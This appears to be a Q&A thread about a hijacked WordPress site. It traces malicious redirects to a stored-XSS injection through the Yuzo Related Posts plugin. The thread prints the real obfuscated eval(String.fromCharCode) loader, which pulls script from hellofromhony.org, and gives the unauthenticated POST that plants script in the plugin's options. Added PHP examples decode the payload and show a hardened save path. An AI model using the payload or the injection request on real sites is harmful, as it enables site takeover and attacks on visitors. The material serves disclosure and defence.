About an hour ago, a WordPress page I manage started redirecting to ad/malware pages.
I found the source of the redirection, want to provide help for others affected, and need help finding the actual vulnerability and/or a fix.
The redirection happens after the site is done loading, so I was looking for a JavaScript snippet in the page and dubious redirections in the Network Analyzer. Obvious malicious redirects were: hellofromhony.org, thebiggestfavoritemake.com, nnatrevaleur.tk, and a site trying to snatch my current location (could not reproduce that one more than once, though).
I was able to trace the redirections back to https://hellofromhony.org/counter, which is embedded via a code snippet.
The snippet was embedded in wp_options in an entry with the key 'yuzo_related_post_options', more specifically in the JSON option 'yuzo_related_post_css_and_style' of the option_value. That option gets echoed without sanitizing.
This option is part of the Yuzo Related Posts plugin, which was discontinued about a week ago: https://wordpress.org/plugins/yuzo-related-post/
Removing that plugin stopped the redirection immediately; I was not able to find other traces of tampering with the site.
The snippet that was in the option_value:
    </style><script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 100, 100, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 49, 53, 44, 32, 57, 57, 44, 32, 49, 49, 52, 44, 32, 49, 48, 53, 44, 32, 49, 49, 50, 44, 32, 49, 49, 54, 41, 59, 118, 97, 114, 32, 101, 108, 101, 109, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 100, 100, 41, 59, 32, 118, 97, 114, 32, 104, 104, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 48, 49, 44, 32, 57, 55, 44, 32, 49, 48, 48, 41, 59, 118, 97, 114, 32, 122, 122, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 49, 54, 44, 32, 49, 48, 49, 44, 32, 49, 50, 48, 44, 32, 49, 49, 54, 44, 32, 52, 55, 44, 32, 49, 48, 54, 44, 32, 57, 55, 44, 32, 49, 49, 56, 44, 32, 57, 55, 44, 32, 49, 49, 53, 44, 32, 57, 57, 44, 32, 49, 49, 52, 44, 32, 49, 48, 53, 44, 32, 49, 49, 50, 44, 32, 49, 49, 54, 41, 59, 101, 108, 101, 109, 46, 116, 121, 112, 101, 32, 61, 32, 122, 122, 59, 32, 101, 108, 101, 109, 46, 97, 115, 121, 110, 99, 32, 61, 32, 116, 114, 117, 101, 59, 101, 108, 101, 109, 46, 115, 114, 99, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 49, 48, 52, 44, 32, 49, 48, 49, 44, 32, 49, 48, 56, 44, 32, 49, 48, 56, 44, 32, 49, 49, 49, 44, 32, 49, 48, 50, 44, 32, 49, 49, 52, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 44, 32, 49, 48, 52, 44, 32, 49, 49, 49, 44, 32, 49, 49, 48, 44, 32, 49, 50, 49, 44, 32, 52, 54, 44, 32, 49, 49, 49, 44, 32, 49, 49, 52, 44, 32, 49, 48, 51, 44, 32, 52, 55, 44, 32, 57, 57, 44, 32, 49, 49, 49, 44, 32, 49, 49, 55, 44, 32, 49, 49, 48, 44, 32, 49, 49, 54, 44, 32, 49, 48, 49, 44, 32, 49, 49, 52, 41, 59, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 104, 104, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 101, 108, 101, 109, 41, 59));</script>
While removing the plugin is a quick fix, I want to dive deeper to be sure that there was no access to the database, backend, and webspace.
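To take a snippet like the one above apart without ever executing it, here is an added example in PHP (written for this page; it is not part of the question and not the plugin's code) that decodes `String.fromCharCode(...)` calls layer by layer and pulls out the remote script URL. The `INNER_LAYER` string is a constructed sample: it is the middle layer of the payload quoted above (the text the outer `String.fromCharCode(...)` decodes to), embedded here so the script runs offline; `wrap_like_payload()` re-wraps it into the `eval(String.fromCharCode(...))` form the question shows.

```php
<?php
declare(strict_types=1);
// Added example, not code from the question: statically decode
// eval(String.fromCharCode(...)) layers so nothing is ever evaluated.

// Constructed sample: the middle layer of the payload quoted in the question
// (what its outer String.fromCharCode(...) decodes to), so this runs offline.
const INNER_LAYER =
    'var dd = String.fromCharCode(115, 99, 114, 105, 112, 116);'
    . 'var elem = document.createElement(dd); '
    . 'var hh = String.fromCharCode(104, 101, 97, 100);'
    . 'var zz = String.fromCharCode(116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116);'
    . 'elem.type = zz; elem.async = true;'
    . 'elem.src = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 104, 101, 108, 108, 111, 102, 114, 111, 109, 104, 111, 110, 121, 46, 111, 114, 103, 47, 99, 111, 117, 110, 116, 101, 114);'
    . 'document.getElementsByTagName(hh)[0].appendChild(elem);';

/** Wrap JS the way the injected snippet did: eval(String.fromCharCode(codes...)). */
function wrap_like_payload(string $js): string
{
    $codes = array_map('ord', str_split($js));
    return 'eval(String.fromCharCode(' . implode(', ', $codes) . '))';
}

/** Turn one String.fromCharCode argument list ("104, 101, ...") back into text. */
function charcodes_to_text(string $args): string
{
    $codes = array_map('intval', preg_split('/\s*,\s*/', trim($args)));
    // chr() only covers 0-255; this payload is plain ASCII, which is all we need.
    return implode('', array_map('chr', $codes));
}

/**
 * Replace every String.fromCharCode(...) call with a double-quoted literal.
 * Loops because the first pass yields JS that itself contains further calls
 * (the inner ones build "script", "head", "text/javascript" and the src URL).
 * The result is meant to be read, not run: nested quotes are left as-is.
 */
function deobfuscate(string $js): string
{
    $pattern = '/String\.fromCharCode\(\s*([0-9]+(?:\s*,\s*[0-9]+)*)\s*\)/';
    while (preg_match($pattern, $js) === 1) {
        $js = preg_replace_callback(
            $pattern,
            fn(array $m): string => '"' . addcslashes(charcodes_to_text($m[1]), "\\\"") . '"',
            $js
        );
    }
    return $js;
}

/** Pull the remote script URL out of the decoded snippet (null if there is none). */
function injected_script_src(string $decoded): ?string
{
    return preg_match('/\.src\s*=\s*"([^"]+)"/', $decoded, $m) === 1 ? $m[1] : null;
}

$posted_form = wrap_like_payload(INNER_LAYER);   // same shape as the snippet in the question
$readable    = deobfuscate($posted_form);
echo $readable, PHP_EOL;
echo 'Remote script loaded: ', injected_script_src($readable) ?? '(none found)', PHP_EOL;
```

Run it with `php decode.php`; the last line names the host the page actually pulls script from, which is the indicator to search for in other tables (wp_posts, wp_postmeta) and in theme files, not just in the one option found so far.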
I do believe I just found it: the Yuzo Related Posts plugin does not check for authentication when saving options.
So POSTing
    yuzo_related_post_css_and_style=</style><script+language=javascript>alert('hacked');</script>
to /wp-admin/options-general.php?page=yuzo-related-post will succeed, even if you're not logged in.
The plugin uses is_admin() to check for authentication, but that is a "false friend": it only checks whether the requested page is in the admin area, not whether a user is authenticated (nor authorized). See the WordPress documentation.
A quick solution to keep using the plugin is just removing the settings option by putting false in the if statement in /assets/functions/options.php, line 1155:
    function __construct(){
        global $if_utils;
        $this->utils = $if_utils;
        if(false/* is_admin() */)
            self::configuration_plugin();
        else
            self::parameters();
    }
Update:
Hang Guan pointed to a blog post about this issue from last week; it seems it is "out in the wild" now.
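As an added illustration (written for this page; not the Yuzo plugin's code and not from the answer), here is the save path the answer describes next to a hardened one: a real capability check instead of is_admin(), a nonce against CSRF, sanitizing before the value reaches wp_options, and stripping again on output. Function, hook and option names prefixed `example_` are invented for this example; the WordPress APIs used (current_user_can, check_admin_referer, wp_nonce_field, wp_strip_all_tags, update_option, admin_post_{action}) are real. The file is a minimal plugin and only runs inside WordPress.

```php
<?php
/**
 * Plugin Name: Hardened related-post CSS option (added example)
 *
 * Added example, not the Yuzo plugin's code: the vulnerable save path described
 * in the answer, next to one that authorizes, checks a nonce, sanitizes on save
 * and strips again on output. Names prefixed "example_" are invented here.
 */

// --- Vulnerable shape (the answer's finding). Deliberately not hooked anywhere.
function example_vulnerable_save() {
    // is_admin() is true for ANY request to a /wp-admin/ URL, logged in or not,
    // so an anonymous POST reaches update_option() with no nonce and no sanitizing.
    if ( is_admin() && isset( $_POST['yuzo_related_post_css_and_style'] ) ) {
        update_option( 'yuzo_related_post_css_and_style', $_POST['yuzo_related_post_css_and_style'] );
    }
}
function example_vulnerable_print() {
    // Raw echo: a stored "</style><script>..." becomes live script on every page.
    echo '<style>' . get_option( 'yuzo_related_post_css_and_style', '' ) . '</style>';
}

// --- Hardened shape.
const EXAMPLE_CSS_OPTION  = 'example_related_post_css';
const EXAMPLE_SAVE_ACTION = 'example_save_related_post_css';

/** Returns sanitized CSS, or null when the input still looks like markup. */
function example_sanitize_css( $css ) {
    $css = wp_strip_all_tags( (string) $css );
    // CSS never legitimately contains "<", so anything left over is rejected
    // rather than stored; that is what keeps "</style><script>" out of the DB.
    if ( preg_match( '/<|javascript\s*:|expression\s*\(/i', $css ) ) {
        return null;
    }
    return $css;
}

function example_save_css() {
    // 1. Authorization: a capability check, which is_admin() never was.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions', '', array( 'response' => 403 ) );
    }
    // 2. CSRF: the form must carry the nonce wp_nonce_field() issued for this action.
    check_admin_referer( EXAMPLE_SAVE_ACTION );
    // 3. Validate and sanitize before anything touches wp_options.
    $raw = isset( $_POST['css'] ) && is_string( $_POST['css'] ) ? wp_unslash( $_POST['css'] ) : '';
    $css = example_sanitize_css( $raw );
    if ( null === $css ) {
        wp_die( 'Rejected: the CSS field may not contain markup', '', array( 'response' => 400 ) );
    }
    update_option( EXAMPLE_CSS_OPTION, $css, false );
    wp_safe_redirect( add_query_arg( 'updated', '1', wp_get_referer() ?: admin_url( 'options-general.php' ) ) );
    exit;
}
// admin_post_{action} only fires for logged-in users; with no admin_post_nopriv_
// counterpart registered, an anonymous request never executes this handler.
add_action( 'admin_post_' . EXAMPLE_SAVE_ACTION, 'example_save_css' );

function example_settings_form() {
    echo '<form method="post" action="' . esc_url( admin_url( 'admin-post.php' ) ) . '">';
    echo '<input type="hidden" name="action" value="' . esc_attr( EXAMPLE_SAVE_ACTION ) . '">';
    wp_nonce_field( EXAMPLE_SAVE_ACTION );
    echo '<textarea name="css">' . esc_textarea( (string) get_option( EXAMPLE_CSS_OPTION, '' ) ) . '</textarea>';
    echo '<button type="submit">Save</button></form>';
}

function example_print_css() {
    // 4. Output: strip again at render time. The stored value may have been
    // written by something other than this form (a SQL client, another plugin,
    // an attacker), which is exactly how the site in the question got hit.
    $css = wp_strip_all_tags( (string) get_option( EXAMPLE_CSS_OPTION, '' ) );
    echo '<style id="example-related-post-css">' . $css . "</style>\n";
}
add_action( 'wp_head', 'example_print_css' );
```

The POST from the answer (`yuzo_related_post_css_and_style=</style><script ...>`) fails against this version three times over: the anonymous request never reaches the handler, a logged-in user without manage_options gets a 403, and a user who does have it still needs a valid nonce and cannot store a `<` at all. The render-time strip is the check that would have defanged the already-injected option even after a compromise like the one in the question.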